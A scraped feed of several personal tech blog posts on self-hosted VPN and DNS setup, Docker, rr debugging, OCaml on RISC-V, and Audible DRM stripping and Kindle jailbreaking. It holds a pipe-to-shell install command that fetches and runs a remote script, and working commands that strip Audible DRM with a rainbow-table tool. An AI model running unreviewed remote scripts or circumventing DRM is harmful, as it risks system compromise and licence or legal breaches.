\u003CREDACTED>\n  private key: (hidden)\n  listening port: 51820\n\npeer: \u003CREDACTED>\n  allowed ips: 10.200.200.2\u002F32\nAlmost There, But Not Quite#\nTurn on your wireguard client and you will notice a strange thing. At this point, you’re not able to browse the internet, but you are able to connect to the wireguard server, and even wireguard acknowledges that (notice the last two lines in the following snippet):\n$ sudo wg show\ninterface: wg0\n  public key: \u003CREDACTED>\n  private key: (hidden)\n  listening port: 51820\n\npeer: \u003Cclient_public_key>\n  endpoint: \u003Cclient_public_ip>:64882\n  allowed ips: 10.200.200.2\u002F32\n  *latest handshake: 8 seconds ago*\n  *transfer: 754.60 KiB received, 5.59 MiB sent*\nWireguard status shows that our client can reach the wireguard server. But still, we’re unable to browse the internet on our client.\nTo debug this further, let’s use tcpdump and monitor the packets coming in on the wg0 interface. Since tcpdump’s output can be overwhelming and contains a lot of noise, let’s filter to monitor only the ICMP packets. 
So we’ll be using ping from the client, which is the easiest way to send ICMP packets from point A to point B.\n# on wireguard client\n➜  ~ ping $(curl icanhazip.com)\n  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current\n                                 Dload  Upload   Total   Spent    Left  Speed\n100    14  100    14    0     0     16      0 --:--:-- --:--:-- --:--:--    16\nPING \u003Cserver_ip_redacted> (\u003Cserver_ip_redacted>): 56 data bytes\n64 bytes from \u003Cserver_ip_redacted>: icmp_seq=0 ttl=64 time=112.126 ms\n64 bytes from \u003Cserver_ip_redacted>: icmp_seq=1 ttl=64 time=142.980 ms\n^C\n--- \u003Cserver_ip_redacted> ping statistics ---\n2 packets transmitted, 2 packets received, 0.0% packet loss\n# on wireguard server\n$ sudo tcpdump -nni wg0 -Q in icmp\ntcpdump: verbose output suppressed, use -v or -vv for full protocol decode\nlistening on wg0, link-type RAW (Raw IP), capture size 262144 bytes\n14:26:31.991498 IP 10.200.200.2 > \u003Cserver_ip_redacted>: ICMP echo request, id 52630, seq 0, length 64\n14:26:33.027288 IP 10.200.200.2 > \u003Cserver_ip_redacted>: ICMP echo request, id 52630, seq 1, length 64\nOkay, this is getting interesting. wg0 is definitely receiving packets from our client. Arghhh. Now does it strike you? Our actual network routing is through eth0 (on DO usually) and wg0 is just some interface created by Wireguard. They have no “connection” (no pun intended) between them. Let us confirm if this actually is the problem by watching for ICMP traffic on this interface (eth0) using the same command:\n# on wireguard server\n$ sudo tcpdump -nni eth0 -Q in icmp\ntcpdump: verbose output suppressed, use -v or -vv for full protocol decode\nlistening on eth0, link-type RAW (Raw IP), capture size 262144 bytes\n... # nothing happens even if we are sending PING from client\nWow, see? No ICMP packets received on eth0. So that indeed is the problem, and we have zeroed in on it using tcpdump.\n(Note to self: Learn more Linux debugging utils, these things are a godsend!)\nIn order to fix this, we need to do 2 things:\nIP Forwarding\n$ vim \u002Fetc\u002Fsysctl.conf\n# check for this line and replace the value from 0 to 1\nnet.ipv4.ip_forward = 1\n$ sudo sysctl -p\nIP Tables Rules\nWe need to set up NAT between eth0 (could be different for you) and wg0. This can be done using iptables, and wireguard has a nice mechanism to run custom commands using PostUp\u002FPostDown hooks.\n# on wireguard server\n$ vim \u002Fetc\u002Fwireguard\u002Fwg0.conf\n# add these lines in [Interface] section\nPostUp = iptables -A FORWARD -i wg0 -j ACCEPT; iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE; ip6tables -A FORWARD -i wg0 -j ACCEPT; ip6tables -t nat -A POSTROUTING -o eth0 -j MASQUERADE # Configure iptables to set up a NAT on eth0 and forward the packets (ipv4 and ipv6) on interface wg0 to eth0\nPostDown = iptables -D FORWARD -i wg0 -j ACCEPT; iptables -t nat -D POSTROUTING -o eth0 -j MASQUERADE; ip6tables -D FORWARD -i wg0 -j ACCEPT; ip6tables -t nat -D POSTROUTING -o eth0 -j MASQUERADE # Delete the rules since when wireguard is down, wg0 doesn't exist\nNow everything’s set up and we are browsing the internet privately using a VPN (a quick way to verify this is sketched below). 
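\nA quick sanity check, reusing icanhazip.com from earlier (the IPs below are placeholders):\n# with the tunnel down, this prints your home\u002FISP address\n$ curl icanhazip.com\n\u003Cyour_isp_ip>\n# bring the tunnel up; it should now print the droplet's address\n$ sudo wg-quick up wg0\n$ curl icanhazip.com\n\u003Cpublic_ip_droplet>\n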
Ensure that your public IP is that of the VPN server when you’re browsing, and that it’s not leaking.\nSetting up Pi-hole#\nInstalling Pi-hole is as simple as\ncurl -sSL https:\u002F\u002Finstall.pi-hole.net | bash\nYou can read more about installation in the official docs.\nA nice GUI is always a plus, so make sure you enable that option while installing Pi-hole.\n\nNow, we need to configure our Wireguard client to use Pi-hole as a nameserver for DNS resolution.\n# on the client add the following line\nsudo vim \u002Fetc\u002Fwireguard\u002Fwg0.conf\n[Interface]\n...\nDNS = \u003Cvpn_server_public_ip>\n...\nPi-hole runs on port 53 and accepts DNS queries over UDP. Any query is first checked by Pi-hole against the blacklist. If it’s present in the blacklist, it’s immediately dropped. If not, Pi-hole will forward our DNS query to one of the configured forwarders (e.g. 1.1.1.1, or our custom server, explained in the next step).\nSetting up Unbound DNS#\nI don’t mind trusting Cloudflare. But I simply don’t have to. :) And once you make peace with the fact that you don’t need 3rd party companies controlling your networking stack, you’ll sleep better.\nI have set up Unbound without any forwarders. Unbound is a recursive resolver which mainly supports DNSSEC and caching. Unbound first checks if the query exists in the cache, and if it does, it directly returns the “answer”. Otherwise it talks to the root nameserver and then the whole DNS dance happens. Since our DNS query is now split into multiple parts, where each nameserver is only being queried for a part of the FQDN (also known as QNAME minimisation), it becomes a lot harder for anyone to intercept or reconstruct your DNS queries.\nYou can install unbound using\n$ sudo apt-get install unbound\nTo start using Unbound, we need a file root.hints which contains information about the root nameservers. You can cron this to fetch a new copy every 3-4 months; it hardly changes.\n$ wget -O root.hints https:\u002F\u002Fwww.internic.net\u002Fdomain\u002Fnamed.root\n$ sudo mv root.hints \u002Fvar\u002Flib\u002Funbound\u002F\n$ sudo service unbound restart\nYou can verify that the DNS queries are being resolved by:\n# 6363 is where I have configured my Unbound server to listen\ndig mrkaran.dev @127.0.0.1 -p 6363\nPi-hole’s official docs have a great explainer on how to configure Unbound with Pi-hole, so I won’t be repeating the steps here again.\nYou can configure Pi-hole to forward accepted DNS queries from port 53 (standard) to 127.0.0.1#6363 (unbound).\n\nThe Endgame#\nI plan to self-host a couple more things. DNS is something I am really interested in, and in the future I plan to host my own DNScrypt server soon-ish.\nI believe if you own your data you’re in better control of your digital identity. Watching too much Black Mirror added to the paranoia to an extent, I suppose! I grew up in the late nineties and I’ve seen the internet primarily as a decentralized set of tools. There’s no reason we should hand any of that to a few corp giants and make it centralized.\nEnding this long-ish post with a beautiful quote:\nStudy after study has shown that human behaviour changes when we know we’re being watched. Under observation, we act less free, which means we effectively are less free.\n― Edward Snowden\nCheers! 
:)",[],{"slug":2360,"title":2361,"link":2362,"pubDate":2363,"contentSnippet":2364,"tags":2365,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"cleaning-google-purchases","Cleaning up Google Purchases","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2019\u002F06\u002F01\u002Fcleaning-google-purchases\u002F","2019-06-01T00:00:00.000Z","The Google Purchase History feature has been doing rounds in the news recently. In case you missed it, go to https:\u002F\u002Fmyaccount.google.com\u002Fpurchases right now and make sure you are logged in with your personal gmail account to see what all Google thinks you’ve bought.\nFor me it lists purchases going as far back as 2013, which include:\nAll of my Amazon Purchases (including Kindle and Audible)\nFlipkart\u002FSneapdeal purchases\nGifts I’ve bought for others on various platforms\nAll my iCloud purchases\nPurchases on Steam\nBigBasket purchases\nGoogle Playstore purchases as well, of course\nAnd much, much more.\nFor each of the purchases, it remembers the price, the taxes, as well as the delivery address used.\nWhile this isn’t shocking in the least, I was surprised, because as a Infosec professional, I’ve disabled all of google’s invasive tracking features:\nAll my Activity Controls are paused.\nGoogle Location history is disabled for my account.\nI have Shared endorsements turned off.\nAd personalization is turned off.\nI used to run with the Protect my Choices extension till a while back to avoid targeted advertising.\nRegardless, the Google purchases page had hundreds of results, going back half a decade. Google currently does not offer a way to delete collected purchases directly, or to pause this collection in any way. The only way is to find the emails that Google scanned, and delete them.\nI ended up deleting everything from the following email addresses:\n\nauto-confirm@amazon.com\nauto-confirm@amazon.in\ncs@flipkart.com\ndigital-no-reply@amazon.com\ndo_not_reply@audible.com\ndo_not_reply@gog.comorders@services.target.com\nebay@ebay.in\ngoogleplay-noreply@google.com\nhelp@stickermule.com\nmail@info.fabfurnish.com\nno-reply@flipkart.com\nno-reply@paytm.com\nno_reply@email.apple.com\nnoreply@flipkart.com\nnoreply@pizzahut.co.in\nnoreply@snapdeals.co.in\nnoreply@steampowered.com\nnotification@wish.com\norder-update@amazon.in\norders@services.target.com\npayments-messages@amazon.in\nreturn@amazon.in\nship-confirm@amazon.com\nship-confirm@amazon.in\nshipment-tracking@amazon.com\nshipment-tracking@amazon.in\nupdates@myntra.com\n\n\nNote that deleting the email doesn’t seem to be sufficient either, you need to clear your Trash, and then wait for a while (almost 2 days for me) before the system refreshes. After 3 days of just deleting mails, I finally got this screen:\n\nGoogle seems to be picking up all kinds of emails, including:\nInvoices\nShipment Confirmations \u002F Updates\nReturn confirmations\nPayment Confirmations\nOrder Cancellations\nPayment Failures (gasp!)\nWarning about Deletions\nI’ve already switched away from Amazon\u002FFlipkart emails from my Gmail. But deleting invoices from your inbox isn’t always the best idea. 
Most websites will let you re-download invoices (Amazon\u002FFlipkart do), but take care not to delete any necessary emails that you might need for warranty claims or any other purpose later.",[],{"slug":2367,"title":2368,"link":2369,"pubDate":2370,"contentSnippet":2371,"tags":2372,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"dnscrypt-migrating-to-docker","Migrating DNSCrypt Server to Docker","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2019\u002F05\u002F18\u002Fdnscrypt-migrating-to-docker\u002F","2019-05-18T00:00:00.000Z","I’ve been running a personal DNSCrypt server in Bangalore for the last 2 years. When I set it up, it was just a compiled version of dnscrypt-wrapper, which was the bare minimum setup I could do.\nSince then, I’ve upgraded it to a distribution supported version, but with the recent changes to dnscrypt key rotation, I’ve been wanting to set up something automated as well.\nThe easiest way was to switch to the official DNSCrypt Docker image, which does both key generation and certificate rotation. Since my public key was already present in the DNSCrypt Server lists, I was not too keen to regenerate a new key.\nThe primary challenge was ensuring that the docker container picks up my existing keys without trying to generate new ones from scratch. It was basically 2 steps:\nMatch the directory structure that the container expects.\nInvoke the container directly into start mode while passing existing keys.\nDirectory Structure\nI copied my keys (public.key, secret.key) to \u002Fetc\u002Fdnscrypt-keys and ran the following:\n\necho 2.dnscrypt-cert.captnemo.in > provider_name\ntouch provider_info.txt # I couldn't figure out how to output the same info, so kept it blank\nhexdump -ve '1\u002F1 \"%.2x\"' \u003C public.key > public.key.txt\n\n\nThen I ensured that the file permissions match what the container expects:\n\nchmod 640 secret.key\nchmod 644 public.key\nchown root:1002 public.key secret.key\nchmod 644 provider_name\n\n\nThis is how the final permissions looked for the directory (\u002Fetc\u002Fdnscrypt-keys)\n\n-rw-r-----   1 root 1002    64 May 18 07:15 secret.key\n-rw-r--r--   1 root 1002    32 May 18 07:15 public.key\n-rw-r--r--   1 root root    28 May 18 07:19 provider_name\n-rw-r--r--   1 root root     0 May 18 07:23 provider_info.txt\n-rw-r--r--   1 root root    64 May 18 07:25 public.key.txt\ndrwxr-xr-x   2 root root  4096 May 18 07:26 .\n\n\nRunning the Container\nThen, I directly ran the dnscrypt-wrapper container:\n\ndocker run --detach --restart=unless-stopped --volume \u002Fetc\u002Fdnscrypt-keys:\u002Fopt\u002Fdnscrypt-wrapper\u002Fetc\u002Fkeys --publish 10.47.0.5:4434:443\u002Ftcp --publish 10.47.0.5:4434:443\u002Fudp jedisct1\u002Fdnscrypt-server start\n\n\nI pass a host path mount instead of creating a Docker Volume, since those can get deleted in a regular docker prune.\nHere, 10.47.0.5 is the “Anchor IP”, which Digital Ocean internally maps to my Floating IP.\nThe container comes up, generates new short-term keys and goes live:\n\nStarting DNSCrypt service for provider:\n2.dnscrypt-cert.captnemo.in\nStarting pre-service scripts in \u002Fetc\u002Frunit_init.d\nsetup in directory \u002Fopt\u002Funbound\u002Fetc\u002Funbound\ngenerating unbound_server.key\nGenerating RSA private key, 3072 bit long modulus (2 primes)\n.......++++\n...................++++\ne is 65537 (0x010001)\ngenerating unbound_control.key\nGenerating RSA private key, 3072 bit long modulus (2 
primes)\n.........................++++\n........................................++++\ne is 65537 (0x010001)\ncreate unbound_server.pem (self signed certificate)\ncreate unbound_control.pem (signed client certificate)\nSignature ok\nsubject=CN = unbound-control\nGetting CA Private Key\nSetup success. Certificates created. Enable in unbound.conf file to use\nok: run: unbound: (pid 28) 300s\nok: run: dnscrypt-wrapper: (pid 31) 300s\nok: run: unbound: (pid 28) 600s\nok: run: dnscrypt-wrapper: (pid 31) 600s\n\n\nOnce the server was up, I verified connectivity with dnscrypt-proxy and it worked perfectly.\nFuture Scope\nRight now, I have a single container that does 2 things:\nCertificate Rotation via a service that checks it every 30 minutes.\nDNSCrypt Service, which is accessible over the internet.\nFor (1) to work, it needs access to the private keys that are used to sign the temporary certificates that last 24 hours. Since both things are managed within the same container, the container ends up with both network access and long-term key access. This means any RCE on the service can result in the long-term keys being compromised.\nA simple fix for this would be to separate out the Certificate Rotation part into a separate “mode” on the Docker image, which can be called independently. This would allow someone to run certificate rotation in a second container using a scheduler, but with far more limitations (such as no network access). A common file-mount between both containers can take care of sharing the temporary keys, and a simple unix socket on the shared file-mount can be used to signal a certificate rotation (this triggers the dnscrypt service restart, so it picks up the new cert).",[],{"slug":2374,"title":2375,"link":2376,"pubDate":2377,"contentSnippet":2378,"tags":2379,"maintainerName":349,"maintainerUsername":350,"maintainerPhoto":351,"feedUrl":352},"0000-rr-debugging","Deterministically debugging concurrent GC bugs with rr","https:\u002F\u002Fkcsrk.info\u002Focaml\u002Fmulticore\u002Frr\u002F2019\u002F04\u002F28\u002F0000-rr-debugging\u002F","2019-04-28T00:00:00.000Z","Multicore OCaml comes with\na concurrent garbage\ncollector, where\nthe garbage collector and the mutator threads run concurrently. Debugging\nconcurrent GC bugs has been the most frustrating \u002F satisfying (when fixed) part\nof Multicore OCaml development. rr, a record and\nreplay tool, has made debugging concurrent GC bugs a sustainable exercise. In\nthis short post, I’ll describe why.\nA particularly tricky concurrent GC bug is one which occurs once every 10 to 100\nruns due to non-determinism, and any attempt to instrument the program to isolate\nthe bug (simplifying the program, adding print statements, etc.) makes it\ndisappear. The bug may only appear relatively late in the program run – after a\nfew major GC cycles, where the program might have allocated 10s of gigabytes of\nmemory by then. The bug usually manifests as a segfault due to illegal memory\naccess, but the source of the bug may lie in the previous GC cycle, perhaps\ndue to actions of a different thread than the one that is throwing up the error.\ngdb often doesn’t help, since finding the illegal memory access may not give\nany clue as to when the heap was corrupted.\nrr to the rescue. rr is an enhancement over gdb with support for recording\nan execution and debugging in reverse. Once a failing execution is recorded,\nthe execution can be replayed multiple times deterministically (a typical session is sketched below). 
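\nA minimal sketch of such a session (the program name and the watched expression are hypothetical):\n# record a failing run once\n$ rr record .\u002Fgc_test\n# replay it deterministically under a gdb-like interface\n$ rr replay\n(rr) continue              # run forward until the crash\n(rr) watch -l obj->field   # hardware watchpoint on the corrupted slot\n(rr) reverse-continue      # run backwards to the store that corrupted it\n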
This removes the\nnon-determinism from the debugging session. gdb does support record and replay,\nbut not on multi-threaded targets.\nThe fact that the program can be run in reverse is the key to debugging heap\ncorruptions. An illegal access typically appears as a load or store to an illegal\nmemory address obtained from a heap object. When such an illegal access is\nfound, I set a hardware watchpoint on the heap address containing the illegal\naddress and continue the program in reverse. rr runs the program in reverse until\nthe write that stored the illegal address in the heap object! Usually, several\ntransitive reverse runs are necessary to get to the source of the bug, but this\nis just mechanics.\nWhile rr supports multi-threaded programs, it runs every thread on the same\ncore. This usually makes the bug disappear. Luckily, rr comes with support for\nforcing a context switch after a certain number of CPU ticks (measured in terms\nof the number of retired conditional branches). Even with this option, you will\nneed many runs before rr comes across a buggy execution. So I use the\nfollowing command:\n\nfor i in {1..10000}; do rr record -c 10000 \u003Cprogram> \u003Cargs>; if (( $? == 0 )); then echo \"done $i\"; else break; fi; done\n\n\nwhich runs \u003Cprogram> \u003Cargs> under rr, where a thread is allowed to execute for a\nmaximum of 10,000 ticks before a context switch. rr runs are repeated until a\ncrash is found or 10,000 rr runs are successfully completed. Depending on the\nprogram being debugged, I leave it running overnight. If rr has in fact found\na crash, I can perform replay debugging with rr replay the following morning\nand have a deterministic and reversible recorded execution to work with.\nrr has saved countless hours in the development of Multicore OCaml, and rr\nshould be an essential tool in every GC hacker’s toolbox.",[],{"slug":2381,"title":2382,"link":2383,"pubDate":2384,"contentSnippet":2385,"tags":2386,"maintainerName":349,"maintainerUsername":350,"maintainerPhoto":351,"feedUrl":352},"1600-ml-workshop-2019","ML Family Workshop 2019: Call for presentations","https:\u002F\u002Fkcsrk.info\u002Focaml\u002Fhaskell\u002Fstandard%20ml\u002Ff%23\u002F2019\u002F04\u002F22\u002F1600-ml-workshop-2019\u002F","2019-04-22T16:00:00.000Z","I am chairing the PC for the ML family workshop this year. The PC is happy to invite\nsubmissions for the workshop, to be held during the ICFP conference week on\nThursday 22nd August 2019.\nThe ML family workshop invites submissions touching on the programming languages\ntraditionally seen as part of the “ML family”. However, we are also keen to\nreceive submissions from other related language groups. If you have questions\nabout the suitability of your work for the workshop, please feel free to write\nan email.\nThe detailed CFP is available on the ICFP website:\nhttps:\u002F\u002Ficfp19.sigplan.org\u002Fhome\u002Fmlfamilyworkshop-2019#Call-for-Presentations\nImportant dates\nThu 16 May 2019 – Submission deadline (AoE)\nSun 30 Jun 2019 – Author Notification\nThu 22 Aug 2019 – ML Family Workshop\nProgram Committee\nAggelos Biboudis – EPFL, Switzerland\nAndreas Rossberg – Dfinity, Germany\nAtsushi Igarashi – Kyoto University, Japan\nAvik Chaudhuri – Facebook, USA\nCyrus Omar – University of Chicago, USA\nDavid Allsopp – University of Cambridge, UK\nEdwin Brady – University of St. 
Andrews, UK\nJacques-Henri Jourdan – CNRS, LRI, Université Paris-Sud, France\nKC Sivaramakrishnan – IIT Madras, India\nLars Bergstrom – Mozilla Research, USA\nMatthew Fluet – Rochester Institute of Technology, USA\nZoe Paraskevopoulou – Princeton University, USA\nSubmission details\nWe seek extended abstracts, up to 3 pages long. Submissions must be uploaded to\nthe workshop submission website:\nhttps:\u002F\u002Ficfp19mlworkshop.hotcrp.com\u002F",[],{"slug":2388,"title":2389,"link":2390,"pubDate":2391,"contentSnippet":2392,"tags":2393,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"docker-mistakes-1","Common Docker Mistakes - Episode 1","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fdocker-mistakes-1\u002F","2019-04-15T05:27:55.000Z","So, of late, I’ve been dabbling a lot with Docker to explore the world of containerization (too late to the party, eh?). I plan to write about some common docker gotchas. The plan is to document these learnings so they might help someone getting started with docker and also serve as a reference for myself in the future. Let me be clear: if you read the docs you will find the exact same information, and there’s nothing new that I have discovered. It took me some time to get around the following issues and I believe some of you might be struggling with the same. I just feel that when you’re starting out with a completely new technology, things can quickly become overwhelming, and it’s A-OK to feel so. The important part is to not get intimidated by it and to focus on learning the basics. Different pieces start coming together and there you have a solved puzzle :)\nThe mysterious case of bind mounts and volumes#\nAh! Storage. It’s never a rosy scenario when someone mentions storage and containers in the same sentence. Anyway, I had this requirement where I needed 2 containers to share data. Either of the containers could modify this data, so it made for a strong use case for volumes. But for some strange reason, I decided to use bind mounts. My thought process was that I’d bind-mount a path from the host into the container and both of them could share the data.\nNow, I know, I know, all the docker veterans are already facepalming so hard, but in case anyone new to docker is reading: it works the exact way I described. The host path will be mounted ON the container, so if your host path is empty, so will your container’s be. It took me quite some time to figure this out because of the side effect of it. I had this line in my docker-compose:\nvolumes:\n  - type: bind\n    source: \u002Fetc\u002Fcustom\u002Fdata\n    target: \u002F\nAs you can guess, I am mounting an empty folder \u002Fetc\u002Fcustom\u002Fdata on the root directory of the container \u002F. This was an nginx container, and I got the weird error that the nginx executable wasn’t found. It became clear that I had obviously done something wrong. After reading the documentation, it became clear that I had to use something like Named Volumes and use the same volume label for both the containers. 
Here’s the correct docker compose example (I have removed the unnecessary fluff and only included the volumes part):\n  nginx:\n    volumes:\n      - type: volume\n        source: assets-vol\n        target: \u002Fusr\u002Fshare\u002Fnginx\u002Ffrontend\n  frontend:\n    volumes:\n      - type: volume\n        source: assets-vol\n        target: \u002Ffrontend\u002Fdist\n\nvolumes:\n  assets-vol:\nassets-vol is a named volume and can be managed using the docker API.\nCMD vs RUN#\nNow, this is particularly interesting. So I have a volume mount as shown in the previous example, and quite naively I am copying some files from container 1 to container 2 at the build stage. I get the error that this path doesn’t exist. I am seriously reconsidering my life decisions right now.\nRUN cp \u002Ffrontend\u002Fdist \u002Fusr\u002Fshare\u002Fnginx\u002Ffrontend\nAnd then it became apparent that the volume is only mounted while the container is running, not while it is building. So I had to use CMD.\nCMD cp \u002Ffrontend\u002Fdist \u002Fusr\u002Fshare\u002Fnginx\u002Ffrontend\nWhy does RUN not work while CMD does, you might ask? Because that’s the nature of docker volumes: they bypass the UnionFS (which is used to build docker images). UnionFS chains together layers of images and builds new images on top. Whenever you run a container from an image, a new layer is created for the container process. If you specify a path as a volume, this path doesn’t get committed to the container data layer and is bypassed. So, TL;DR: volumes are really only accessible when the container is running, and you can’t access them while building.\nEpilogue#\nI plan to share more such silly mistakes of mine while exploring more of Docker (and hopefully running production workloads on it soon!). It really is fun though, believe me :)",[],{"slug":2395,"title":2396,"link":2397,"pubDate":2398,"contentSnippet":2399,"tags":2400,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"audible-drm","Stripping Audible DRM","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2019\u002F04\u002F14\u002Faudible-drm\u002F","2019-04-14T00:00:00.000Z","A self-guide for stripping the Audible DRM, in a similar vein to my Kindle Self-Guide.\nDownload the aax file from the Audible website.\nRun the inAudible-NG Rainbow crack table against the AAX file.\nThe easiest way is via docker\u002Fpodman:\n\ncd ~\u002FMusic\u002FAudiobooks\npodman run -v $(pwd):\u002Fdata ryanfb\u002Finaudible@sha256:b66738d235be1007797e3a0a0ead115fa227e81e2ab5b7befb97d43f7712fac5\nfor i in *.m4a; do fix-audible-m4a \"$i\"; done\n\n\nThe cool part about this is that the entire activation is done offline, and runs a Rainbow Table attack against the Audible DRM. To make the process faster in the future, you can save your “activation bytes” (8 hex characters) and directly use them with ffmpeg to decode instead:\nffmpeg -loglevel panic -y -activation_bytes ${AUDIBLE_ACTIVATION_BYTES} -i \"$aax_file\" -c:a copy -vn \"$m4a_file\"\nA small percentage of Audible AAX files have an incorrect bit set in the “Audio Object Type Specific Config” in the ESDS atom of the M4A file, which leads to them not playing in\nFirefox\u002FAndroid and some other players. 
To fix this, I have the fix-audible-m4a script called above.\nReferences\nhttps:\u002F\u002Fgithub.com\u002Fryanfb\u002Fdocker_inaudible_rainbowcrack\nhttps:\u002F\u002Fgithub.com\u002FinAudible-NG\u002Ftables\nhttps:\u002F\u002Frentry.co\u002Fn4ost",[],{"slug":2402,"title":2403,"link":2404,"pubDate":2405,"contentSnippet":2406,"tags":2407,"maintainerName":349,"maintainerUsername":350,"maintainerPhoto":351,"feedUrl":352},"1400-ocaml-baremetal-shakti","OCaml on Baremetal Shakti RISC-V processor","https:\u002F\u002Fkcsrk.info\u002Focaml\u002Friscv\u002Fshakti\u002F2019\u002F03\u002F29\u002F1400-ocaml-baremetal-shakti\u002F","2019-03-29T14:00:00.000Z","It has been 3 months since I joined IIT Madras and it\nhas been good fun so far. Along with the members of the RISE\ngroup, we’ve initiated a project to build secure\napplications on top of secure extensions of the open-source\nShakti RISC-V processor ecosystem. Unsurprisingly, my\nlanguage of choice for building the applications is OCaml.\nGiven the availability of a rich ecosystem of libraries under the\nMirageOS library operating system for building unikernels,\nwe hope to minimise the amount of unsafe C code that the hardware has to contend\nwith and protect against exploits. As a first step, we have managed to get OCaml\nprograms to run directly on top of the Shakti processor running in simulation\nunder the QEMU and Spike ISA simulators without an intervening operating system.\nA custom bootloader performs the necessary hardware initialisation and\ntransfers control directly to the OCaml program. We have\nopen-sourced\nall of the tools necessary to build your own kernel. This handy\ndockerfile\ndocuments the entire process. For the impatient, an image is available on\nDocker Hub:\n\n$ docker run -it iitmshakti\u002Friscv-ocaml-baremetal:0.1.0\n\n# Write your program\n$ echo 'let _ = print_endline \"A camel treads on hardware!\"' > hello.ml\n# Compile for Shakti\n$ ocamlopt -output-obj -o payload.o hello.ml\n$ file payload.o\npayload.o: ELF 64-bit LSB relocatable, UCB RISC-V, version 1 (SYSV), not stripped\n\n# Link with bootcode and build the kernel\n$ make -C ..\u002Fbuild\nmake: Entering directory '\u002Froot\u002Focaml-baremetal-riscv\u002Fbuild'\nmake[1]: Entering directory '\u002Froot\u002Focaml-baremetal-riscv\u002Fbuild'\nmake[2]: Entering directory '\u002Froot\u002Focaml-baremetal-riscv\u002Fbuild'\nmake[2]: Leaving directory '\u002Froot\u002Focaml-baremetal-riscv\u002Fbuild'\n[ 64%] Built target boot\nmake[2]: Entering directory '\u002Froot\u002Focaml-baremetal-riscv\u002Fbuild'\nmake[2]: Leaving directory '\u002Froot\u002Focaml-baremetal-riscv\u002Fbuild'\n[ 78%] Built target freestanding-compat\nmake[2]: Entering directory '\u002Froot\u002Focaml-baremetal-riscv\u002Fbuild'\nmake[2]: Leaving directory '\u002Froot\u002Focaml-baremetal-riscv\u002Fbuild'\n[ 85%] Built target asmrun_t\nmake[2]: Entering directory '\u002Froot\u002Focaml-baremetal-riscv\u002Fbuild'\nmake[2]: Leaving directory '\u002Froot\u002Focaml-baremetal-riscv\u002Fbuild'\n[ 92%] Built target nolibc_t\nmake[2]: Entering directory '\u002Froot\u002Focaml-baremetal-riscv\u002Fbuild'\nmake[2]: Leaving directory '\u002Froot\u002Focaml-baremetal-riscv\u002Fbuild'\n[100%] Built target kernel\nmake[1]: Leaving directory '\u002Froot\u002Focaml-baremetal-riscv\u002Fbuild'\nmake: Leaving directory '\u002Froot\u002Focaml-baremetal-riscv\u002Fbuild'\n$ file kernel \nkernel: ELF 64-bit LSB executable, UCB RISC-V, version 1 (SYSV), statically linked, with debug_info, not stripped\n\n# 
Run under the spike RISC-V ISA simulator\n$ spike kernel\nocaml-boot: heap@0x80042be8 stack@0x8002fbc0\nA camel treads on hardware!\nocaml-boot: caml runtime returned. shutting down!\n\n# Run under QEMU\n$ qemu-system-riscv64 -machine spike_v1.10 -smp 1 -m 1G -serial stdio -kernel kernel\nVNC server running on 127.0.0.1:5900\nocaml-boot: heap@0x80042be8 stack@0x8002fbc0\nA camel treads on hardware!\nocaml-boot: caml runtime returned. shutting down!\n\n\nThe immediate next step will be getting the code to run on a Shakti softcore on\nan FPGA. In addition to targeting high-end FPGAs, we will also be targeting the\n$100 Arty\nA7\nhobbyist board and releasing all of the software under liberal open-source\nlicenses.\nFurther along, we will port Mirage libraries to Shakti, following a setup\nsimilar to the Well-typed lightbulbs, and\nimplement hardware security enhancements in Shakti for preventing spatial and\ntemporal attacks while running unsafe C code (with the ability to dynamically\nturn it off when running OCaml!), hardware-assisted compartments, etc. Lots of\nexciting possibilities on the horizon!\nAcknowledgements\nMuch of this work was done by the incredible Malte,\nwho is a visiting student at IIT Madras on a semester away from Leibniz\nUniversity Hannover,\nArjun, Lavanya,\nAmbika, Chester, and the rest of the\nShakti team. The RISC-V port of OCaml is developed and maintained by Nicolás\nOjeda Bär.",[],{"slug":2409,"title":2410,"link":2411,"pubDate":2412,"contentSnippet":2413,"tags":2414,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"kindle-self-guide","Kindle Hacks, A Self-guide","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2019\u002F03\u002F26\u002Fkindle-self-guide\u002F","2019-03-26T00:00:00.000Z","I run a non-standard Kindle configuration:\nJailbroken (because I want to own the device, not rent it)\nRuns KOReader (because I want to read EPUBs and PDFs with reflow.)\nDRM Stripping (because I want to own the book, not rent it)\nSince I don’t do any of these often enough to automate it, this is a self-guide to help me follow these steps the next time I have to do any of this. No guarantees of this being helpful to anyone else but me.\nJailbreak\nThe lifehacker guide on how to jailbreak your kindle is a good starting point [archived]. The mobileread forums have the definitive guides. Also see this FAQ on the mobileread wiki.\n(Most of these only cover modern paperwhite kindles)\nMaintaining the Jailbreak\nSometimes, Kindle firmware updates will undo the jailbreak. Search for your firmware on the mobileread forums. See this link for the 5.8 series.\nCopy the .bin file to your kindle root directory and trigger a manual firmware update. That should reboot and re-affirm the jailbreak. To trigger a manual firmware update, go to the Kindle Menu and click “Update”. If it is greyed out, check if the file was copied correctly, and try rebooting.\nApplications\nOnce you have a jailbreak, the rest is mostly installing packages via MRPI. I keep a ready directory of packages I can copy as-is to my Kindle. 
